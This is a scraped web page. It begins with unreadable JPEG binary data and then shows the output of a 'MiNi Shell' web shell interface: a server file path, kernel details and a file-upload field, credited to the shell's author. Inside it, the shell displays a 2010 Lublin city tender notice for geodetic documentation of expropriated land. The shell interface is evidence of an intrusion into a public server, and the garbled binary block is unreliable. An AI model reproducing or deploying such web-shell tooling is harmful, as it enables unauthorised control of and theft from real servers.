JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100310/53411-N-2010.html

<p class="kh_header"><b>Lublin: Wykonanie opracowań dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych położonych na terenie miasta Lublin - II części</b><br>
<b>Numer ogłoszenia: 53411 - 2010; data zamieszczenia: 10.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lublin , Pl. Łokietka 1, 20-950 Lublin, woj. lubelskie, tel. 081 4663000, faks 081 4663001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie opracowań dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych położonych na terenie miasta Lublin - II części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: wykonanie opracowań dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych położonych na terenie miasta Lublin - II części:

Część I - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych orzeczeniami Prezydium Wojewódzkiej Rady Narodowej w Lublinie z dnia 15 listopada 1954 r., Nr.Sa.II-47/4/52 i Nr.Sa.XI-47/4/52 oznaczonych w rejestrze pomiarowym z roku 1952 r. jako działki o numerach: nr 1 o pow. 27200 m kw.; nr 2 o pow. 31693 m kw.; nr 3 o pow. 32354 m kw.; nr 4 o pow. 5761 m kw.; nr 5 o pow. 10815 m kw.; nr 6 o pow. 8881 m kw.; nr 7 o pow. 33376 m kw.; nr 8 o pow. 17118 m kw., nr 9 o pow. 26143 m kw.; nr 10 o pow. 25068 m kw.; nr 11 o pow. 13322 m kw.; nr 12 o pow. 15615 m kw.; nr 13 o pow. 25786 m kw.; nr 14 o pow. 26214 m kw.; nr 15 o pow. 11102 m kw.; nr 16 o pow. 22347 m kw.; nr 17 o pow. 22204 m kw.; nr 18 o pow. 11461 m kw.; nr 19 o pow. 9312 m kw.; nr 20 o pow. 9312 m kw.; nr 21 o pow. 9312 m kw.; nr 22 o pow. 8593 m kw.; nr 23 o pow. 9312 m kw.; nr 24 o pow. 8596 m kw.; nr 25 o pow. 8452 m kw.; nr 26 o pow. 9168 m kw.; nr 27 o pow. 10023 m kw.; nr 28 o pow. 8160 m kw.; nr 29 o pow. 5298 m kw.; nr 30 o pow. 13171 m kw.; nr 31 o pow. 16889 m kw.; nr 32 o pow. 9300 m kw.; nr 33 o pow. 8871 m kw.; nr 34 o pow. 9300 m kw.; nr 35 o pow. 8585 m kw.; nr 36 o pow. 6796 m kw.; nr 37 o pow. 6088 m kw.; nr 38 o pow. 12893 m kw.; nr 39 o pow. 13447 m kw.; nr 40 o pow. 27314 m kw.; nr 41 o pow. 25976 m kw.; nr 42 o pow. 10639 m kw.; nr 43 o pow. 15734 m kw.; nr 44 o pow. 4843 m kw.; nr 45 o pow. 10288 m kw.; nr 46 o pow. 9104 m kw.; nr 47 o pow. 7729 m kw.; nr 48 o pow. 7290 m kw.; nr 49 o pow. 6588 m kw.; nr 50 o pow. 5909 m kw.; nr 51 o pow. 8513 m kw.; nr 52 o pow. 3224 m kw.; nr 53 o pow. 2353 m kw.; nr 54 o pow. 1514 m kw.; nr 55 o pow. 560 m kw.; nr 56 o pow. 38 m kw. stanowiących obecnie części działki ewidencyjnej nr 1 (obr. 11, ark. 10), stanowiącej tereny zamknięte - poligon wojskowy - wykonanie dokumentacji dotyczy postępowań o zwrot nieruchomości na rzecz poprzednich właścicieli.  

Część II - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych orzeczeniem Prezydium Wojewódzkiej Rady Narodowej w Lublinie z dnia 29 listopada 1952 r., Nr L.dz. Sa.II.1250/52, oznaczonych w wykazie nieruchomości stanowiącym załącznik do wyżej wymienionego orzeczenia z roku 1952 r. jako działki o numerach : nr 27 o pow. 25888 m kw.; nr 23 o pow. 7092 m kw.; nr 31 o pow. 4764 m kw.; nr 30 o pow. 5007 m kw.; nr 29 o pow. 9112 m kw.; nr 55 o pow. 2510 m kw.; nr 38 o pow. 1013 m kw.; nr 37 o pow. 2923 m kw.; nr 36 o pow. 2398 m kw. stanowiących obecnie części działek ewidencyjnych nr nr 1/1, 1/2, 1/3,1/4, 1/5, 1/6 (obr. 11, ark. 1) stanowiącej tereny zamknięte - koszary wojskowe - wykonanie dokumentacji dotyczy postępowań o zwrot nieruchomości na rzecz poprzednich właścicieli.

2.Zakres zamówienia obejmuje:

2.1.Etap I:

2.1.1.zgłoszenie prac geodezyjnych opisanych w pkt 3.1. we właściwym ze względu na położenie i status nieruchomości ośrodku dokumentacji geodezyjnej i kartograficznej,

2.1.2.zebranie i analiza materiałów źródłowych, 

2.1.3.badanie ksiąg wieczystych działek, których częścią  jest działka wywłaszczona,

2.1.4.aktualizacja mapy zasadniczej w zakresie instrukcji technicznej K-1 /dotyczy działki wywłaszczonej/,

2.1.5.naniesienie na kserokopię mapy zasadniczej stanu użytkowania /orientacyjnie/ oraz stanu wg. planu zagospodarowania,

2.1.6.opracowanie mapy ze szczegółowym rozliczeniem działki wywłaszczonej w nawiązaniu do istniejącej ewidencji gruntów,

2.1.7.udział w wizji lokalnej przeprowadzonej przez Zamawiającego celu okazania granic działek wywłaszczonych,

2.2.Etap II

2.2.1.ustalenie stanu prawnego nieruchomości w dacie ich wywłaszczenia z odszukaniem w archiwach dokumentów stanowiących tytuł własności,

2.3.Etap III:

2.3.1.opracowanie mapy będącej podstawą do ujawnienia w ewidencji gruntów oraz w księdze wieczystej dokonanego zwrotu działki, po zakwalifikowaniu opracowania wg. pkt 2.1.6. (terminem wiążącym jest okres trzech lat od daty podpisania umowy),

2.3.2.wprowadzenie zmian na mapie zasadniczej w związku ze zwrotem działki,

2.3.3.utrwalenie oraz okazanie punktów granicznych zwróconej działki byłym właścicielom ze spisaniem protokołu okazania,

2.3.4.w przypadku przedłużającego się okresu zwrotu działki Wykonawca zobowiązany jest do zaktualizowania dokumentacji geodezyjnej stosownie do obowiązującej w tym okresie ewidencji gruntów a ponadto zobowiązany jest do wykonania innych wersji dokumentacji do zwrotu nieruchomości, w przypadku zaistnienia takiej potrzeby (terminem wiążącym jest okres trzech lat od daty podpisania umowy).

3.Etap II podlega wykonaniu w przypadku odnalezienia w archiwach dokumentów określających stan prawny nieruchomości w dacie wywłaszczenia.
1.4.Etap III podlega wykonaniu w przypadku wydania przez właściwy organ ostatecznej decyzji o zwrocie nieruchomości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w niniejszym postępowaniu dopuszcza możliwość składania ofert częściowych na wykonanie zamówienia wg podziału:

Część I - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych orzeczeniami Prezydium Wojewódzkiej Rady Narodowej w Lublinie z dnia 15 listopada 1954 r., Nr.Sa.II-47/4/52 i Nr.Sa.XI-47/4/52 oznaczonych w rejestrze pomiarowym z roku 1952 r. jako działki o numerach: nr 1 o pow. 27200 m kw.; nr 2 o pow. 31693 m kw.; nr 3 o pow. 32354 m kw.; nr 4 o pow. 5761 m kw.; nr 5 o pow. 10815 m kw.; nr 6 o pow. 8881 m kw.; nr 7 o pow. 33376 m kw.; nr 8 o pow. 17118 m kw., nr 9 o pow. 26143 m kw.; nr 10 o pow. 25068 m kw.; nr 11 o pow. 13322 m kw.; nr 12 o pow. 15615 m kw.; nr 13 o pow. 25786 m kw.; nr 14 o pow. 26214 m kw.; nr 15 o pow. 11102 m kw.; nr 16 o pow. 22347 m kw.; nr 17 o pow. 22204 m kw.; nr 18 o pow. 11461 m kw.; nr 19 o pow. 9312 m kw.; nr 20 o pow. 9312 m kw.; nr 21 o pow. 9312 m kw.; nr 22 o pow. 8593 m kw.; nr 23 o pow. 9312 m kw.; nr 24 o pow. 8596 m kw.; nr 25 o pow. 8452 m kw.; nr 26 o pow. 9168 m kw.; nr 27 o pow. 10023 m kw.; nr 28 o pow. 8160 m kw.; nr 29 o pow. 5298 m kw.; nr 30 o pow. 13171 m kw.; nr 31 o pow. 16889 m kw.; nr 32 o pow. 9300 m kw.; nr 33 o pow. 8871 m kw.; nr 34 o pow. 9300 m kw.; nr 35 o pow. 8585 m kw.; nr 36 o pow. 6796 m kw.; nr 37 o pow. 6088 m kw.; nr 38 o pow. 12893 m kw.; nr 39 o pow. 13447 m kw.; nr 40 o pow. 27314 m kw.; nr 41 o pow. 25976 m kw.; nr 42 o pow. 10639 m kw.; nr 43 o pow. 15734 m kw.; nr 44 o pow. 4843 m kw.; nr 45 o pow. 10288 m kw.; nr 46 o pow. 9104 m kw.; nr 47 o pow. 7729 m kw.; nr 48 o pow. 7290 m kw.; nr 49 o pow. 6588 m kw.; nr 50 o pow. 5909 m kw.; nr 51 o pow. 8513 m kw.; nr 52 o pow. 3224 m kw.; nr 53 o pow. 2353 m kw.; nr 54 o pow. 1514 m kw.; nr 55 o pow. 560 m kw.; nr 56 o pow. 38 m kw. stanowiących obecnie części działki ewidencyjnej nr 1 (obr. 11, ark. 10), stanowiącej tereny zamknięte - poligon wojskowy - wykonanie dokumentacji dotyczy postępowań o zwrot nieruchomości na rzecz poprzednich właścicieli.  

Część II - opracowanie dokumentacji geodezyjnej na tle istniejącej ewidencji gruntów nieruchomości wywłaszczonych orzeczeniem Prezydium Wojewódzkiej Rady Narodowej w Lublinie z dnia 29 listopada 1952 r., Nr L.dz. Sa.II.1250/52, oznaczonych w wykazie nieruchomości stanowiącym załącznik do wyżej wymienionego orzeczenia z roku 1952 r. jako działki o numerach : nr 27 o pow. 25888 m kw.; nr 23 o pow. 7092 m kw.; nr 31 o pow. 4764 m kw.; nr 30 o pow. 5007 m kw.; nr 29 o pow. 9112 m kw.; nr 55 o pow. 2510 m kw.; nr 38 o pow. 1013 m kw.; nr 37 o pow. 2923 m kw.; nr 36 o pow. 2398 m kw. stanowiących obecnie części działek ewidencyjnych nr nr 1/1, 1/2, 1/3,1/4, 1/5, 1/6 (obr. 11, ark. 1) stanowiącej tereny zamknięte - koszary wojskowe - wykonanie dokumentacji dotyczy postępowań o zwrot nieruchomości na rzecz poprzednich właścicieli.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy wykażą dysponowanie osobami posiadającymi uprawnienia zawodowe (świadectwa) w dziedzinie geodezji i kartografii nadane przez Głównego Geodetę Kraju, w zakresie określonym w art. 43 pkt 2 ustawy z dnia 17 maja 1989 r. - Prawo geodezyjne i kartograficzne (Dz. U. z 2005 r. nr 24 poz. 2027) tj rozgraniczenia i podziały nieruchomości oraz sporządzanie dokumentacji do celów prawnych - min. 1 osoba.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - w przypadku składania oferty przez podmioty występujące
wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców
składających ofertę wspólną. 

2.Oświadczenie o części zamówienia, której wykonanie, wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom. 

3.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych (dotyczy również wspólników spółki cywilnej). Treść pełnomocnictwa musi rozstrzygać, czy ustanowiony pełnomocnik jest uprawniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia publicznego, czy również do zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna także identyfikować wszystkich wykonawców ubiegających się
wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika.

4.Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub wykonawca - w przypadku osób fizycznych. 

5. W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego
łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do
dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu
zamówienia. 

6.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma
siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1) zmiana kwoty podatku VAT oraz wynagrodzenia brutto,
2) zmiana terminu realizacji poszczególnych etapów przedmiotu zamówienia,
w przypadku:
a) działania siły wyższej, uniemożliwiającej wykonanie umowy umowy
w określonym pierwotnie terminie,
b) uniemożliwienia Wykonawcy dostępu do nieruchomości będącej przedmiotem
opracowania geodezyjno - prawnego przez osoby trzecie, w których władaniu
pozostaje ta nieruchomość,
c) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających
wykonanie prac geodezyjnych w terenie.
d) brak dostępu do archiwów w celu odnalezienia dokumentów niezbędnych do
wykonania przedmiotu umowy,

2. Zmiany umowy przewidziane w pkt. 1 dopuszczalne są na następujących warunkach:
- ad pkt 1) - kwota podatku VAT oraz wynagrodzenie brutto ulegną zmianie
odpowiednio do przepisów prawa wprowadzających zmianę;
- ad pkt 2) - zmiana terminu realizacji poszczególnych etapów przedmiotu zamówienia:
lit. a) - o okres działania siły wyższej oraz potrzeby usunięcia skutków tego
działania,
lit. b) - o okres braku dostępu Wykonawcy do nieruchomości będącej przedmiotem
wyceny,
- lit. c) - o czas trwania niesprzyjających warunków atmosferycznych.
lit. d) - o okres braku dostępu do archiwów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych UM Lublin, Plac Litewski 1, pokój 8, po dokonaniu wpłaty 5,00 zł w budynku UM przy ul. Wieniawskiej 14 lub za zaliczeniem pocztowym (5,00 zł + koszt przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2010 godzina 12:00, miejsce: Biuro Zamówień Publicznych Urzędu Miasta Lublin, Plac Litewski 1, 20-080 Lublin, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Osobami upoważnionymi do kontaktowania się z wykonawcami są: 

1.1.W zakresie przedmiotu zamówienia: - p. Małgorzata Zdunek - Wydział Gospodarowania Mieniem Urzędu Miasta Lublin, ul. Wieniawska 14, pokój 712, tel. (081) 466-27-50.
- p. Paweł Misiec - Wydział Gospodarowania Mieniem Urzędu Miasta Lublin, ul. Wieniawska 14, pokój 711, tel. (081) 466-27-19.
1.2.W zakresie procedury: p. Mariusz Przybysz - Biuro Zamówień Publicznych Urzędu Miasta  Lublin, Plac Litewski 1, pokój nr 8, telefon (081) 466-30-24.

2.Pełnomocnictwo, o którym mowa w pkt III.6)4 i III.6)5
powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z
oryginałem kopii przez osoby wystawiające pełnomocnictwo, notariusza lub osoby, których uprawnienie do reprezentacji wynika z dokumentu rejestracyjnego wykonawcy, zgodnie ze sposobem reprezentacji określonym w tych dokumentach. 

3.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: 

3.1.oświadczenie o spełnieniu warunków udziału w postępowaniu winno być złożone wspólnie przez wykonawców.

3.2.dokumenty wymagane w III.4.2) winien złożyć każdy wykonawca. 

4. Wszystkie dokumenty z pkt III.4) oraz dokumenty z pkt. III.6)5. i III.6)6. ogłoszenia winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - poświadczenie winno zawierać zapis odręczny lub w formie pieczęci /za zgodność z oryginałem/. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. 

5.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt III.6)5. kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów winny być poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.

6.Dokumenty sporządzone w języku obcym należy składać wraz z tłumaczeniem na
język polski.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com